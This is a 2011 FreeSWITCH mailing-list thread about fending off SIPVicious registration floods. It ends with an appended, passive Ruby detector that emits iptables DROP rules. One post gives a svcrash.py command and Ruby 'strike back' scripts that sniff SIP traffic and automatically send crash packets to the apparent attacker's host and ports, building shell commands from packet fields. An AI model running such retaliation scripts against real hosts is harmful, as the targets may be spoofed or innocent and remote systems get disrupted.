[Freeswitch-users] SPIT attack and how to strike back

Avi Marcus avi at avimarcus.net
Thu Apr 21 16:02:32 MSD 2011


True. See http://wiki.freeswitch.org/wiki/QoS for other helpful iptables
commands for rate limiting.
Or, http://wiki.freeswitch.org/wiki/Fail2ban#SIP_DOS_Attack for actual
fail2ban-ing too many auth challenges.  (<-- I have this one set)
Or http://etel.wiki.oreilly.com/wiki/index.php/SIP_DoS/DDoS_Mitigation for
lots of cool stuff.

But all
of these are passive, to drop packets. This thread was started as a way to
actually impede the scanner...

-Avi


On Thu, Apr 21, 2011 at 2:10 PM, Kerem Erciyes <kerem.erciyes at gmail.com> wrote:

> That would work until attacker defines a custom user-agent string. There
> have been reports of modified SipVicious code using Asterisk PBX as the
> agent.
>
>
>> On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <denisgalvao at gmail.com> wrote:
>
>> Nice! Thanks for sharing!
>>
>> Denis
>>
>> 2011/4/20, Peter P GMX <Prometheus001 at gmx.net>:
>> > Hello all,
>> >
>> > I would like to share this with you as you may have also been affected
>> > by this threat.
>> >
>> > Yesterday we received a SPIT attack to our Freeswitch servers. We had
>> > about 50 register requests/sec. We noticed this as we saw a slight
>> > increase in the load of the Freeswitch servers. Fortunately Freeswitch
>> > can handle a huge amount of register requests so we had no denial of
>> > service.
>> >
>> > You can identify this attack by finding the following in the Register
>> > message:
>> >     User-Agent: friendly-scanner
>> >
>> > How to get rid of it:
>> > The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
>> > nice tool "svcrash.py" which can send a malformed packet back to the
>> > attacker which crashes their own Sipvicious tool. You can issue this
>> > tool by
>> >   python svcrash.py -d <host of attacker> -p <port of attacker>
>> > You will need port 5060 on your machine to work. But there is also a
>> > workaround for that. svcrash.py will show how to overcome this if your
>> > port 5060 is not available.
>> > Download it here
>> > http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
>> > unpack it to a folder of your choice.
>> >
>> > I wrote a small Ruby script to send the packet back to a port range, as
>> > our attacker used some dozens of ports to send.
>> > Here is the script (Install ruby first by "apt-get install ruby" e.g. on
>> > Debian based systems). Put it into the sipvicious directory
>> > kill_ports.rb:
>> >
>> > #!/usr/bin/env ruby
>> > host=ARGV[0]
>> > start_port=ARGV[1].to_i
>> > end_port=ARGV[2].to_i
>> > start_port.upto(end_port) do |port|
>> >   cmd="python svcrash.py -d #{host} -p #{port}"
>> >   p cmd
>> >   erg=`#{cmd}`
>> >   p erg
>> > end
>> >
>> > You now can run it by
>> > ./kill_ports.rb <ip> <from_port> <to_port>
>> >
>> > By using this tool we got rid of most of the SPIT messages. But after a
>> > while they started again to attack us from different ports.
>> >
>> > The next step is: Why not automate this by trying to identify host and
>> > port automatically and send back the svcrash.py packet to the sender's
>> > port?
>> >
>> > First install the pcap library
>> >     apt-get install libpcap-dev libpcap-ruby
>> >
>> > Then I wrote the following tool to automate this, it makes use of the
>> > kill_ports.rb above:
>> > strike_back.rb:
>> >
>> > #!/usr/bin/env ruby
>> > # I used some code from http://snippets.dzone.com/posts/show/5931
>> > require 'pcaplet'
>> > require 'logger'
>> > require 'timeout'
>> > @timeout=3600 # max runtime: 1 hour
>> >
>> > @logfile='strike_back.log'
>> > class AuditLogger < Logger
>> >   def format_message(severity, timestamp, progname, msg)
>> >     puts msg
>> >     "#{msg}\n"
>> >   end
>> > end
>> >
>> > logfile = File.open(@logfile, 'a')
>> > LOGGER = AuditLogger.new(logfile)
>> > LOGGER.level = Logger::INFO
>> > search="friendly-scanner"
>> > puts "Searching for '#{search}' in SIP packets"
>> > $network = Pcaplet.new('-s 1500')
>> > $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
>> > $network.add_filter($filter)
>> > puts "Logfile: #{@logfile}"
>> > puts "Starting capture..."
>> > begin
>> >   Timeout.timeout(@timeout) do # 3600 sec
>> >     for p in $network
>> >         header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")} #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
>> >         if $filter =~ p
>> >             #puts "simple search"
>> >             if p.udp_data.index(search)
>> >               LOGGER.info "Kill Friendly scanner #{p.src} with Source Port #{p.sport}"
>> >               cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
>> >               erg=`#{cmd}`
>> >               p erg
>> >               LOGGER.info header
>> >               LOGGER.info p.udp_data
>> >             end
>> >         end
>> >     end
>> >   end
>> > rescue Timeout::Error
>> >   logfile.flush
>> >   puts "Timeout - finished."
>> > end
>> >
>> > There may be a better way to code this, but at least it worked. After
>> > about 15min the number of attacks went to 0.
>> >
>> > Disclaimer: You can damage other systems by using these tools. So be
>> > careful and use at your own risk. Do not use this tool for attacking
>> > other systems!
>> >
>> > Best regards
>> > Peter
>> >
>> > _______________________________________________
>> > FreeSWITCH-users mailing list
>> > FreeSWITCH-users at lists.freeswitch.org
>> > http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
>> > UNSUBSCRIBE:
>> > http://lists.freeswitch.org/mailman/options/freeswitch-users
>> > http://www.freeswitch.org
>> >
>>
>> --
>> Sent from my cell phone
>>
>>
>
>
>
> --
> Kerem Erciyes - System Consultant
> http://keremerciyes.com
>
>
>
>
>
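As an added example (not code from the thread or from SIPVicious), here is the passive counterpart to strike_back.rb in the same Ruby: it parses captured REGISTER requests, flags the friendly-scanner User-Agent Peter matched on and, to cover the custom-User-Agent evasion Kerem raises, also flags any source that exceeds the roughly 50 REGISTER/sec rate Peter reported, then emits iptables DROP rules instead of svcrash packets. The packet hashes, addresses and User-Agent strings are constructed; the pcap loop that would feed them is assumed, not included.

```ruby
# Added example, not from the thread: classify SIP REGISTER traffic the passive
# way (drop, don't strike back) by User-Agent and by per-source rate.
SCANNER_AGENTS = ['friendly-scanner', 'sipvicious'].freeze
RATE_LIMIT_PER_SEC = 50 # the thread saw ~50 REGISTER/sec during the attack
# Parse a SIP request's start line and headers; nil if the payload isn't SIP.
def parse_sip_request(payload)
  lines = payload.to_s.split(/\r?\n/)
  m = lines.first.to_s.match(%r{\A([A-Z]+) \S+ SIP/2\.0\z})
  return nil unless m
  headers = {}
  lines.drop(1).each do |l|
    break if l.empty?
    name, value = l.split(':', 2)
    headers[name.strip.downcase] = value.strip if value
  end
  { method: m[1], headers: headers }
end

# Returns { src_ip => reason } for sources to drop. A known scanner User-Agent is
# enough; a custom one is still caught once REGISTERs/sec from one source exceed the limit.
def classify_registers(packets)
  per_sec = Hash.new(0)
  verdicts = {}
  packets.each do |pkt|
    req = parse_sip_request(pkt[:data])
    next unless req && req[:method] == 'REGISTER'
    src = pkt[:src]
    ua = req[:headers].fetch('user-agent', '')
    verdicts[src] ||= "scanner User-Agent '#{ua}'" if SCANNER_AGENTS.any? { |a| ua.downcase.include?(a) }
    key = [src, pkt[:time].to_i]
    per_sec[key] += 1
    verdicts[src] ||= "#{per_sec[key]} REGISTER/sec" if per_sec[key] > RATE_LIMIT_PER_SEC
  end
  verdicts
end

# Constructed sample: one friendly-scanner REGISTER, three from a real phone,
# and 51 within one second from a host claiming to be "Asterisk PBX".
def sample_packets
  reg = ->(ua) { "REGISTER sip:pbx.example.invalid SIP/2.0\r\nVia: SIP/2.0/UDP x\r\nUser-Agent: #{ua}\r\nContent-Length: 0\r\n\r\n" }
  t = Time.at(1_303_387_200)
  [{ src: '192.0.2.10', time: t, data: reg.call('friendly-scanner') }] +
    Array.new(3) { |i| { src: '192.0.2.20', time: t + i, data: reg.call('ExamplePhone/1.0') } } +
    Array.new(51) { { src: '198.51.100.5', time: t, data: reg.call('Asterisk PBX') } }
end
# Emit iptables DROP rules for the verdicts (printed here, not executed).
def iptables_rules(verdicts)
  verdicts.keys.map { |ip| "iptables -I INPUT -s #{ip} -p udp --dport 5060 -j DROP" }
end
puts iptables_rules(classify_registers(sample_packets)) if __FILE__ == $PROGRAM_NAME
```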

